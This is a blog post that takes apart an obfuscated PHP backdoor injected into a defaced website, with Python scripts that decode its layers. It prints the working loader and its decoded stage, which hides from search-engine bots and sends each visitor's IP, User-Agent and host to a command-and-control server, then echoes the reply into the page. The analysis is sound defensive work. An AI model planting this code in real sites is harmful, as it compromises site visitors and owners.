Security

Sorai's site was reportedly defaced, so I took the injected code apart

January 23, 2012

Sorai's service was hit by a defacement, and the injected attack code was posted, so I had a go at analyzing it.

So, I worked through the code. The obfuscation mechanism itself is simple, but following the flow was quite tiring, lol.

The code in question

Here is the code in question.

<?php
@error_reporting(0);
if (!isset($eva1fYlbakBcVSir)) {
    $eva1fYlbakBcVSir = "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";
    $eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";
    $eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";
    $eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";
    $eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);
    $eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);
    $eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);
    $eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];
    $eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);
    $eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));
    $eva1tYldakBcVSir = "";
    $eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
    $eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
    $eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";
    $eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";
    $eva1tYldakBoVS1r = "\x65\143\x72\160";
    $eva1tYldakBcVSir = "";
    $eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
    $eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
}
?>

Let's expand this step by step.

<?php
 @error_reporting(0);
 if (!isset($eva1fYlbakBcVSir)) {
 //$eva1fYlbakBcVSir = "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";

Something base64-encoded. The loader never decodes it as a whole; it is split on the '+' character a few lines further down.

//$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";
 $eva1tYlbakBcVSir = "edolpxe";

Decoding the escapes (a mix of \xHH hex and \NNN octal, both legal in a PHP double-quoted string) gives "edolpxe", which is "explode" written backwards.

//$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";
 $eva1tYldakBcVSir = "strrev";

The name of the function that puts reversed strings back, strrev, itself written as escapes.

//$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";
 $eva1tYldakBoVS1r = "ecalper_gerp";

Again decode the escapes and reverse, and you get "preg_replace".

//$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";
 $eva1tYidokBoVSjr = ';))]1[rjSVcBkadiYt1ave$(edoced_46esab(lave@:eval("\1");:@(.+)@ie';

Decoding this one also gives a reversed string; read backwards it is `ei@)+.(@:;)"1\"(lave:@eval(base64_decode($eva1tYidakBcVSjr[1]));` (the code only reverses the first ':'-separated piece, but reading the whole thing backwards is enough to see the shape). These look like the arguments of a preg_replace call, and the part that base64-decodes the blob defined on the first line is already visible.

//$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);
 $eva1tYldokBcVSjr = strrev( "ecalper_gerp" );

This line restores the reversed name: strrev("ecalper_gerp") → preg_replace. Note the variable names: $eva1tYldokBcVSjr here and $eva1tYldakBcVSjr on the next line differ by a single letter; the look-alike names are part of the obfuscation.

//$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);
 $eva1tYldakBcVSjr = strrev( "edolpxe" );

Same thing here: strrev("edolpxe") → explode.

//$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);
 $eva1tYidakBcVSjr = $eva1tYldakBcVSjr( '+', $eva1fYlbakBcVSir );

In other words, $eva1tYidakBcVSjr = explode('+', <base64 string>). chr(2687.5*0.016) is chr(43), i.e. '+'; the float arithmetic exists only to hide the constant from a grep.

explode splits its second argument wherever its first argument occurs. So the base64 string from the first line is split at the single '+' that appears in the middle of it. Doing that gives:

Array
 (
 [0] => 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
 [1] => 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
 )

the string split into two pieces, as shown above.

//$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];
 $eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.001891];

This pulls an element out of the array produced by the explode one line up. PHP truncates a float subscript to an integer, so [0.001891] is [0], and the first piece, 7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn….Jg0DI1UTayZGJ, is taken.
At first sight this looks like a decoy, since nothing in this file visibly uses it, but as the analysis goes on it turns out to play an important role.

//$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);
 $eva1tYidokBcVSjr = $eva1tYldakBcVSjr( ':', $eva1tYidokBoVSjr);

In other words, it runs

 $eva1tYidokBcVSjr = explode(':',';))]1[rjSVcBkadiYt1ave$(edoced_46esab(lave@:eval("\1");:@(.+)@ie');

which splits on ':', so

 Array
 (
 [0] => ;))]1[rjSVcBkadiYt1ave$(edoced_46esab(lave@
 [1] => eval("\1");
 [2] => @(.+)@ie
 )

three elements come out.

//$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));
$eva1tYldokBcVSjr( $eva1tYidokBcVSjr[2], $eva1tYidokBcVSjr[1], strrev( $eva1tYidokBcVSjr[0]) );

The subscripts evaluate to 2, 1 and 0 (0.016*(7812.5*0.016) = 2, 62.5*0.016 = 1, 0.061*0.031 = 0.001891 → 0), so this is

preg_replace( "@(.+)@ie", 'eval("\1");', '@eval(base64_decode($eva1tYidakBcVSjr[1]));' );

That is the whole trick. The e modifier at the end of the pattern "@(.+)@ie" tells preg_replace to run the replacement as PHP code after substituting the match for \1, so the subject string is itself executed: the second piece [1] of the blob that was split on '+' is base64-decoded and passed to eval. (The e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so this stage only works on older interpreters.)

Base64-decoding the part of the blob after the '+' gives:

if (!isset($evalUdCXTDQERmWnDS)) {function evallwhVfIVnWPbT($s){$e = ""; for ($a = 0; $a <= strlen($s)-1; $a++ ){$e .= $s{strlen($s)-$a-1};}return($e);}eval(evallwhVfIVnWPbT(';))"=ASf7kyaNRmbBRXWvNnRjFUWJxWY2VGJoUGZvNWZk9FN2U2chJGIuJXd0Vmc7BSKr1EZuFEdZ92cGNWQZlEbhZXZkgiRTJkZPl0ZhRFbPBFaO1EbhZXZg42bpR3YuVnZ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"7kiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXNFZnNEZVlVaFNVbhxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"7kiI90TQjBjUIFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXZVchZlcpV2VUxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"7kiI9QzVhJCKGNlQm9USnFGVs9EUo5UTsFmdl1jQmhFRVdEdiVFZCxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"==wOpISP9EVS2R2VJJCKGNlQm9USnFGVs9EUo5UTsFmdl1TZVpnRuV2QsJ2dRxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"=sTXpISV1UlUIZEMYNlVwUlV5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk0zQmN2ZNBndpNXTyxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"=sTKpkicqNlVjF0ahRGWZRXMhZXZkgidlJnc0NHKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"=sTKpISP9c2YshXbZRnRtVlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI0Y1RaVnRXdlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI9kEWaJDbHFmaKhVWmZ0VhJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICM50WUP5kVUJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpISPB52YxgnMVJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICb4JjW2ljMSJCKGNlQm9USnFGVs9EUo5UTsFmdlhSehJnchBSPgQHUEh2bzdEduREdUxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"==wOpkiI5QHVLpnUDtkeS5mYsJlbiZnTygFMWJjWmZ1RiBnWHF1Z002YxIFWalHdIlEcNhkSvRTbR1kTyIlSsBDVaZ0MhpkSVRlRkZkYopFWadGNyIGcSNTW1ZlbaJCKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"==wOpgCMkRGJg0DIYpHRyh1TId2SnxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"==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"(edoced_46esab(lave'));$evalUdCXTDQERmWnDS =18792;}

a fresh chunk of PHP, which the eval executes.
Everything that follows in the loader is decoy code with no effect.

    $eva1tYldakBcVSir = "";

    //$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
    $eva1tYldakBoVS1r = "edolpxe"."edolpxe";

    //$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
    $eva1tYidokBoVSjr = "edolpxe";

    //$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";
    $eva1tYldakBcVSir = "strecrptr";

    //$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";
    $eva1tYlbakBcVSir = "gao[pxe";

    //$eva1tYldakBoVS1r = "\x65\143\x72\160";
    $eva1tYldakBoVS1r = "ecrp";

    $eva1tYldakBcVSir = "";

    //$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
    $eva1tYldakBoVS1r = "gao[pxe"."gao[pxe";

    //$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
    $eva1tYidokBoVSjr = "gao[pxe";

}
?>
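As an added example (not code from the original post, nor from the malware itself), here is the same stage-1 walk-through done by script: it expands the mixed hex/octal escapes, applies strrev, evaluates the float tricks the way PHP's chr() and array subscripts do, and hands back the three arguments of the final preg_replace() call. The base64 blob itself is not reproduced on this page, so decode_stage1() takes any placeholder string with a single '+' in it; the escaped literals are copied from the loader above.

```python
import re

# Added example (not part of the original post): a tiny decoder for the
# stage-1 tricks. It reproduces by code what the post does by hand: the mixed
# \xHH / \NNN escapes of PHP double-quoted strings, strrev(), and the float
# arithmetic that hides the constants passed to chr() and used as subscripts.

_ESC = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")


def php_unescape(s: str) -> str:
    """Expand the hex and octal escapes of a PHP double-quoted string."""
    return _ESC.sub(
        lambda m: chr(int(m.group(1), 16)) if m.group(1) is not None
        else chr(int(m.group(2), 8)),
        s,
    )


def php_strrev(s: str) -> str:
    return s[::-1]


def php_chr(x: float) -> str:
    """PHP's chr() truncates a float argument to int (and reduces it mod 256)."""
    return chr(int(x) % 256)


def php_index(x: float) -> int:
    """A float array subscript is truncated to int: [0.001891] is [0]."""
    return int(x)


# The escaped literals exactly as they appear in the loader above.
LIT_EXPLODE = r"\x65\144\x6f\154\x70\170\x65"
LIT_STRREV = r"\x73\164\x72\162\x65\166"
LIT_PREG_REPLACE = r"\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160"
LIT_TEMPLATE = (
    r"\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76"
    r"\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145"
    r"\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145"
)


def decode_stage1(blob: str) -> dict:
    """Walk the loader's data flow and return the arguments of its final preg_replace().

    `blob` stands in for the long base64 string on the loader's first line
    (not reproduced on the page); it must contain exactly one '+'.
    """
    explode = php_strrev(php_unescape(LIT_EXPLODE))            # 'explode'
    preg_replace = php_strrev(php_unescape(LIT_PREG_REPLACE))  # 'preg_replace'
    template = php_unescape(LIT_TEMPLATE)

    halves = blob.split(php_chr(2687.5 * 0.016))           # explode('+', blob)
    decoy = halves[php_index(0.031 * 0.061)]               # [0]: kept for stage 3
    parts = template.split(php_chr(3625 * 0.016))          # explode(':', template)
    pattern = parts[php_index(0.016 * (7812.5 * 0.016))]   # [2]  '@(.+)@ie'
    replacement = parts[php_index(62.5 * 0.016)]           # [1]  'eval("\1");'
    subject = php_strrev(parts[php_index(0.061 * 0.031)])  # [0] reversed

    # With the e modifier, preg_replace() evaluates the replacement as PHP after
    # substituting the match for \1 (PHP runs addslashes() on the match first;
    # this subject contains nothing that needs escaping).
    executed = replacement.replace("\\1", subject)
    return {
        "functions": (explode, preg_replace),
        "pattern": pattern,
        "replacement": replacement,
        "subject": subject,
        "executed": executed,
        "decoy_half": decoy,
        "payload_half": halves[1],
    }


if __name__ == "__main__":
    for key, value in decode_stage1("AAAA+BBBB").items():
        print(f"{key:13} {value!r}")
```

Running the script prints the reconstructed call; `executed` is the PHP that the e modifier actually runs, i.e. `eval("@eval(base64_decode($eva1tYidakBcVSjr[1]));");`. PHP truncates the floats in these positions, which is why the author's constants were chosen to multiply out to exact integers (43, 58, 0, 1, 2); a product that landed on 42.9999 would break the loader.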

 

 

Analysis of the code that came out

 

if (!isset($evalUdCXTDQERmWnDS)) {

	function evallwhVfIVnWPbT($s){
		$e = "";
		for ($a = 0; $a <= strlen($s)-1; $a++ ){
			$e .= $s{strlen($s)-$a-1};
		}
		
		return($e);
	}
	
	eval(evallwhVfIVnWPbT(';))"=ASf7kyaNRmbBRXWvNnRjFUWJxWY2VGJoUGZvNWZk9FN2U2chJGIuJXd0Vmc7BSKr1EZuFEdZ92cGNWQZlEbhZXZkgiRTJkZPl0ZhRFbPBFaO1EbhZXZg42bpR3YuVnZ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"7kiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXNFZnNEZVlVaFNVbhxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"7kiI90TQjBjUIFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXZVchZlcpV2VUxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"7kiI9QzVhJCKGNlQm9USnFGVs9EUo5UTsFmdl1jQmhFRVdEdiVFZCxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"==wOpISP9EVS2R2VJJCKGNlQm9USnFGVs9EUo5UTsFmdl1TZVpnRuV2QsJ2dRxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"=sTXpISV1UlUIZEMYNlVwUlV5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk0zQmN2ZNBndpNXTyxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"=sTKpkicqNlVjF0ahRGWZRXMhZXZkgidlJnc0NHKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"=sTKpISP9c2YshXbZRnRtVlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI0Y1RaVnRXdlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI9kEWaJDbHFmaKhVWmZ0VhJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICM50WUP5kVUJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpISPB52YxgnMVJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICb4JjW2ljMSJCKGNlQm9USnFGVs9EUo5UTsFmdlhSehJnchBSPgQHUEh2bzdEduREdUxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"==wOpkiI5QHVLpnUDtkeS5mYsJlbiZnTygFMWJjWmZ1RiBnWHF1Z002YxIFWalHdIlEcNhkSvRTbR1kTyIlSsBDVaZ0MhpkSVRlRkZkYopFWadGNyIGcSNTW1ZlbaJCKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"==wOpgCMkRGJg0DIYpHRyh1TId2SnxWY2VGJ"(edoced_46esab(lave'));
	eval(evallwhVfIVnWPbT(';))"==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"(edoced_46esab(lave'));
	$evalUdCXTDQERmWnDS =18792;
}

Tidied up, that is what the code looks like.

All the function evallwhVfIVnWPbT does is reverse a string, the same as strrev. Each line reverses its argument and evaluates (executes) the result. (The $s{...} brace syntax for string offsets is another sign of old PHP; it was removed in PHP 8.0.)

Running each line through the function:

//eval(evallwhVfIVnWPbT(';))"=ASf7kyaNRmbBRXWvNnRjFUWJxWY2VGJoUGZvNWZk9FN2U2chJGIuJXd0Vmc7BSKr1EZuFEdZ92cGNWQZlEbhZXZkgiRTJkZPl0ZhRFbPBFaO1EbhZXZg42bpR3YuVnZ"(edoced_46esab(lave'));
 eval(base64_decode("ZnVuY3Rpb24gZXZhbE1OaFBPbFRhZ0lPZkJTRigkZXZhbElZQWNGc29ZdEFuZE1rKSB7cmV0dXJuIGJhc2U2NF9kZWNvZGUoJGV2YWxJWUFjRnNvWXRBbmRNayk7fSA="));
//eval(evallwhVfIVnWPbT(';))"7kiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXNFZnNEZVlVaFNVbhxWY2VGJ"(edoced_46esab(lave'));
 eval(base64_decode("JGV2YWxhbVNFaVlVZENnZFNXPWV2YWxNTmhQT2xUYWdJT2ZCU0YoImMzUmhkSE09Iik7"));
//eval(evallwhVfIVnWPbT(';))"7kiI90TQjBjUIFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXZVchZlcpV2VUxWY2VGJ"(edoced_46esab(lave'));
 eval(base64_decode("JGV2YWxUV2VpclZhcVZXPWV2YWxNTmhQT2xUYWdJT2ZCU0YoImFIUjBjQT09Iik7"));
//eval(evallwhVfIVnWPbT(';))"7kiI9QzVhJCKGNlQm9USnFGVs9EUo5UTsFmdl1jQmhFRVdEdiVFZCxWY2VGJ"(edoced_46esab(lave'));
 eval(base64_decode("JGV2YWxCZFVidEdVRFhmQj1ldmFsTU5oUE9sVGFnSU9mQlNGKCJhVzQ9Iik7"));
//eval(evallwhVfIVnWPbT(';))"==wOpISP9EVS2R2VJJCKGNlQm9USnFGVs9EUo5UTsFmdl1TZVpnRuV2QsJ2dRxWY2VGJ"(edoced_46esab(lave'));
 eval(base64_decode("JGV2YWxRd2JsQ2VuRnpVZT1ldmFsTU5oUE9sVGFnSU9mQlNGKCJJV2R2SVE9PSIpOw=="));
//eval(evallwhVfIVnWPbT(';))"=sTXpISV1UlUIZEMYNlVwUlV5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk0zQmN2ZNBndpNXTyxWY2VGJ"(edoced_46esab(lave'));
 eval(base64_decode("JGV2YWxyTXNpdnBNZ2NmQz0kX1NFUlZFUltldmFsTU5oUE9sVGFnSU9mQlNGKCJTRlJVVUY5VlUwVlNYMEZIUlU1VSIpXTs="));
//eval(evallwhVfIVnWPbT(';))"=sTKpkicqNlVjF0ahRGWZRXMhZXZkgidlJnc0NHKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave'));
 eval(base64_decode("ZXZhbChldmFsTU5oUE9sVGFnSU9mQlNGKHN0cnJldigkZXZhMXRZWGRha0FjVlNqcikpKTs="));
//eval(evallwhVfIVnWPbT(';))"=sTKpISP9c2YshXbZRnRtVlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI0Y1RaVnRXdlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI9kEWaJDbHFmaKhVWmZ0VhJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICM50WUP5kVUJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpISPB52YxgnMVJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICb4JjW2ljMSJCKGNlQm9USnFGVs9EUo5UTsFmdlhSehJnchBSPgQHUEh2bzdEduREdUxWY2VGJ"(edoced_46esab(lave'));
 eval(base64_decode("JGV2YWxUdERudEdzb2hEUHQgPSBhcnJheShldmFsTU5oUE9sVGFnSU9mQlNGKCJSMjl2WjJ4bCIpLCBldmFsTU5oUE9sVGFnSU9mQlNGKCJVMngxY25BPSIpLCBldmFsTU5oUE9sVGFnSU9mQlNGKCJUVk5PUW05MCIpLCBldmFsTU5oUE9sVGFnSU9mQlNGKCJhV0ZmWVhKamFHbDJaWEk9IiksIGV2YWxNTmhQT2xUYWdJT2ZCU0YoIldXRnVaR1Y0IiksIGV2YWxNTmhQT2xUYWdJT2ZCU0YoIlVtRnRZbXhsY2c9PSIpKTs="));
//eval(evallwhVfIVnWPbT(';))"==wOpkiI5QHVLpnUDtkeS5mYsJlbiZnTygFMWJjWmZ1RiBnWHF1Z002YxIFWalHdIlEcNhkSvRTbR1kTyIlSsBDVaZ0MhpkSVRlRkZkYopFWadGNyIGcSNTW1ZlbaJCKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave'));
 eval(base64_decode("ZXZhbChldmFsTU5oUE9sVGFnSU9mQlNGKCJablZ1WTNScGIyNGdaWFpoYkZkRlRVSkphM0ZaVDBsSlIyTk1RbTRvSkhNcElIdHlaWFIxY200Z1FHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDUnpLVHQ5IikpOw=="));
//eval(evallwhVfIVnWPbT(';))"==wOpgCMkRGJg0DIYpHRyh1TId2SnxWY2VGJ"(edoced_46esab(lave'));
 eval(base64_decode("JGV2YWxnS2dIT1hyRHpYID0gJGRkMCgpOw=="));
//eval(evallwhVfIVnWPbT(';))"==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"(edoced_46esab(lave'));
 eval(base64_decode("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"));
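An added example, not from the original post: the stage-2 unwrapping above done by script. Given the literal passed to evallwhVfIVnWPbT (the strrev clone), it reverses it, checks that the result is an eval(base64_decode("...")) wrapper, decodes the base64, and then inlines the evalMNhPOlTagIOfBSF("...") calls found inside (that function is just base64_decode under another name, as the first decoded line shows). The three sample arguments are copied verbatim from the list above; everything else is mine.

```python
import base64
import re

# Added example (not part of the original post): peel the stage-2 wrapper.
# Each eval(evallwhVfIVnWPbT('...')) line carries a reversed string that reads
# eval(base64_decode("...")); once reversed. This script reverses it, pulls the
# base64 literal out, decodes it, and then resolves the inner
# evalMNhPOlTagIOfBSF("...") calls (a renamed base64_decode) to plain literals,
# which is the manual work the post does for each line.

_WRAPPER = re.compile(r'eval\(base64_decode\("([A-Za-z0-9+/=]+)"\)\);')


def peel_reversed_eval(arg: str) -> str:
    """`arg` is the literal passed to evallwhVfIVnWPbT (a strrev clone)."""
    m = _WRAPPER.fullmatch(arg[::-1])
    if m is None:
        raise ValueError("unexpected wrapper: " + arg[::-1][:40])
    return base64.b64decode(m.group(1)).decode("latin-1")


def resolve_b64_calls(code: str, names=("base64_decode", "evalMNhPOlTagIOfBSF")) -> str:
    """Replace every name("<base64>") call with the decoded PHP string literal."""
    pat = re.compile(r'(?:%s)\("([A-Za-z0-9+/=]+)"\)' % "|".join(map(re.escape, names)))

    def literal(m):
        s = base64.b64decode(m.group(1)).decode("latin-1")
        return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"

    return pat.sub(literal, code)


# Three of the wrapper arguments exactly as they appear in the sample.
SAMPLE_LINES = [
    ';))"7kiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXNFZnNEZVlVaFNVbhxWY2VGJ"(edoced_46esab(lave',
    ';))"=sTXpISV1UlUIZEMYNlVwUlV5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk0zQmN2ZNBndpNXTyxWY2VGJ"(edoced_46esab(lave',
    ';))"==wOpgCMkRGJg0DIYpHRyh1TId2SnxWY2VGJ"(edoced_46esab(lave',
]


def decode_stage2(lines=SAMPLE_LINES) -> list:
    """Reverse + base64-decode each wrapper, then inline the inner base64 literals."""
    return [resolve_b64_calls(peel_reversed_eval(line)) for line in lines]


if __name__ == "__main__":
    for out in decode_stage2():
        print(out)
```

The three lines come out as `$evalamSEiYUdCgdSW='stats';`, `$evalrMsivpMgcfC=$_SERVER['HTTP_USER_AGENT'];` and `$evalgKgHOXrDzX = $dd0();`, i.e. the cookie name, the User-Agent lookup and the call that produces the C2 domain. The fullmatch check matters: if a line does not reverse into exactly the expected wrapper, you want the script to stop rather than decode garbage.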

Decoding those base64 strings gives

function evalMNhPOlTagIOfBSF($evalIYAcFsoYtAndMk) {return base64_decode($evalIYAcFsoYtAndMk);}
 $evalamSEiYUdCgdSW=evalMNhPOlTagIOfBSF("c3RhdHM=");
 $evalTWeirVaqVW=evalMNhPOlTagIOfBSF("aHR0cA==");
 $evalBdUbtGUDXfB=evalMNhPOlTagIOfBSF("aW4=");
 $evalQwblCenFzUe=evalMNhPOlTagIOfBSF("IWdvIQ==");
 $evalrMsivpMgcfC=$_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9VU0VSX0FHRU5U")];
 eval(evalMNhPOlTagIOfBSF(strrev($eva1tYXdakAcVSjr)));
 $evalTtDntGsohDPt = array(evalMNhPOlTagIOfBSF("R29vZ2xl"), evalMNhPOlTagIOfBSF("U2x1cnA="), evalMNhPOlTagIOfBSF("TVNOQm90"), evalMNhPOlTagIOfBSF("aWFfYXJjaGl2ZXI="), evalMNhPOlTagIOfBSF("WWFuZGV4"), evalMNhPOlTagIOfBSF("UmFtYmxlcg=="));
 eval(evalMNhPOlTagIOfBSF("ZnVuY3Rpb24gZXZhbFdFTUJJa3FZT0lJR2NMQm4oJHMpIHtyZXR1cm4gQGZpbGVfZ2V0X2NvbnRlbnRzKCRzKTt9"));
 $evalgKgHOXrDzX = $dd0();
 if((preg_match("/" . implode("|", $evalTtDntGsohDPt) . "/i", $evalrMsivpMgcfC)) or (isset($_COOKIE[$evalamSEiYUdCgdSW]))) {} else { @setcookie($evalamSEiYUdCgdSW,md5(evalMNhPOlTagIOfBSF("c3RhdHM=")),time()+10800); $evalsssgqulVBTkZLAch = evalWEMBIkqYOIIGcLBn($evalTWeirVaqVW.evalMNhPOlTagIOfBSF("Og==").evalMNhPOlTagIOfBSF("Ly8=").$evalgKgHOXrDzX.evalMNhPOlTagIOfBSF("Lw==").$evalBdUbtGUDXfB.evalMNhPOlTagIOfBSF("LnBo").evalMNhPOlTagIOfBSF("cD8=").evalMNhPOlTagIOfBSF("aT0=").$_SERVER[evalMNhPOlTagIOfBSF("UkVNT1RFX0FERFI=")].evalMNhPOlTagIOfBSF("JmI9").urlencode($evalrMsivpMgcfC).evalMNhPOlTagIOfBSF("Jmg9").urlencode($_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9IT1NU")]));if (strstr($evalsssgqulVBTkZLAch,$evalQwblCenFzUe)){$evalsssgqulVBTkZLAch = explode($evalQwblCenFzUe,$evalsssgqulVBTkZLAch); $evalsssgqulVBTkZLAch = $evalsssgqulVBTkZLAch[1];echo $evalsssgqulVBTkZLAch;}}

 

That is what comes back, so let's tidy it up.

function evalMNhPOlTagIOfBSF($evalIYAcFsoYtAndMk) {
	return base64_decode($evalIYAcFsoYtAndMk);
}

$evalamSEiYUdCgdSW=evalMNhPOlTagIOfBSF("c3RhdHM=");
$evalTWeirVaqVW=evalMNhPOlTagIOfBSF("aHR0cA==");
$evalBdUbtGUDXfB=evalMNhPOlTagIOfBSF("aW4=");
$evalQwblCenFzUe=evalMNhPOlTagIOfBSF("IWdvIQ==");
$evalrMsivpMgcfC=$_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9VU0VSX0FHRU5U")];
eval(evalMNhPOlTagIOfBSF(strrev($eva1tYXdakAcVSjr)));
$evalTtDntGsohDPt = array(
	evalMNhPOlTagIOfBSF("R29vZ2xl"),
	evalMNhPOlTagIOfBSF("U2x1cnA="),
	evalMNhPOlTagIOfBSF("TVNOQm90"),
	evalMNhPOlTagIOfBSF("aWFfYXJjaGl2ZXI="),
	evalMNhPOlTagIOfBSF("WWFuZGV4"),
	evalMNhPOlTagIOfBSF("UmFtYmxlcg==")
);
eval(evalMNhPOlTagIOfBSF("ZnVuY3Rpb24gZXZhbFdFTUJJa3FZT0lJR2NMQm4oJHMpIHtyZXR1cm4gQGZpbGVfZ2V0X2NvbnRlbnRzKCRzKTt9"));
$evalgKgHOXrDzX = $dd0();
